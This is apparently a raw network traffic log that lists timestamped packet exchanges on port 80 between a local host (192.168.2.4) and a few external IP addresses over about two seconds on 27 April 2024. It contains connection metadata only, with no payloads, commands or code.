Apr 27, 2024 02:19:16.889681101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.893506050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.936094046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.936223030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.936249018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.936300039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.936341047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.936410904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.936444998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.936497927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.936497927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.936553001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.937092066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.937146902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.937392950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.940331936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.949455976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.989320993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.989582062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.996489048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.996604919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.996721983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.996809006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.996849060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.996901989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.996965885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.996984959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.997071028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.997230053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.000266075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.000335932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.000387907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.045430899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.045587063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.045646906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.045660973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.066154957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.066359997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.090351105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.107929945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.107985020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108036995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108092070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108155966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.108177900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108251095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.108350039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.108781099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108844995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.108881950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.108941078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.112190008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.112243891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.112265110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.112320900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.160125971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.160238981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.191956997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192051888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192157030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.192203045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192317009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192397118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.192439079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192503929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192562103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.192625999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192677021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.192724943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.195657969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.195712090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.195766926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.195976973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.242209911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.242269993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.242357016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.279381990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.279443979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.279546022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.279598951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.279658079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.279663086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.279795885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.279949903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.280004978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.280013084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.280060053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.283637047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.283693075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.283771038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.286562920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.290323973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.332115889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.332186937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.332254887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.332312107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.387366056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387419939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387474060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.387491941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387798071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387851000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387892008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.387934923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.387984037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.388005972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.388056993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.390299082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.391921997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.392066002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.392126083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.423813105 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 27, 2024 02:19:17.440512896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.440567970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.440618038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.440638065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.454879999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.454977036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.454982996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.455032110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.455132008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.455197096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.461292028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.461360931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.489777088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.489865065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.489919901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.503956079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.504024029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.504025936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.504081964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.512094021 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 27, 2024 02:19:17.512155056 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 27, 2024 02:19:17.512254000 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 27, 2024 02:19:17.543311119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.583678961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.583858967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.584451914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.584502935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.584575891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.584625959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.584678888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.584800959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.585005999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.586839914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.586908102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.587042093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.588646889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.588736057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.588845015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.627141953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.627196074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.627204895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.627238989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.627285004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.627347946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.637490034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.637598038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.638430119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.676000118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.676086903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.685894966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.685969114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.739312887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.739371061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.739432096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.739480972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779469967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779540062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779584885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779632092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779659033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779706955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779730082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779774904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779803038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779849052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.779872894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.779917002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.781605005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.781666040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.781699896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.781749010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.783829927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.783852100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.783905029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.783967972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.800052881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.800133944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.800143957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.800189018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.800192118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.800333977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.834908009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.834958076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.834965944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.835027933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.848611116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.848711014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.882834911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.882961035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.936316967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.936465979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.936477900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.936568975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.972716093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.972810984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.972876072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.972882986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:17.972930908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.973092079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:17.976670980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.976985931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.977065086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.977078915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.977116108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.978703022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.978779078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:17.978825092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:17.978902102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.019464016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.019506931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.019534111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.019572973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.029192924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.029208899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.029270887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.029299021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.078711033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.078777075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.131798983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.131874084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.145448923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.145558119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.145560980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.145574093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.145684958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.172744036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.172756910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.172817945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.172827959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.172841072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.172874928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.172904015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.174082041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.174175024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.174335957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.174393892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.191090107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.191119909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.197300911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.224543095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.224646091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.316245079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.316260099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.316272020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.316354990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.368865967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.368937969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.368943930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.369024038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.369035006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.369086027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.369113922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.369153976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.369180918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.369188070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.369235992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.370851994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.370910883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.370935917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.371011019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.371063948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.416982889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.417077065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.419898987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.465182066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.487179995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.487241983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.541181087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.541244030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.541412115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.541485071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.564384937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.564487934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.564501047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.564549923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.566823006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.566836119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.566847086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.566884041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.566915035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.567023039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.567034960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.567078114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.587991953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.588051081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.659143925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.659207106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.660213947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.711692095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.711749077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.711800098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.711844921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.711921930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.711972952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.715187073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.759414911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.759527922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.760189056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.760219097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.760263920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.760268927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.762542963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.762594938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.762659073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.762759924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.762803078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.762871981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.763051033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.763094902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.763143063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.808964014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.831808090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.831887007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.883193016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.883220911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.883234024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.883256912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.883281946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.883281946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.883342028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.910640001 CEST	80	49734	176.97.76.106	192.168.2.4
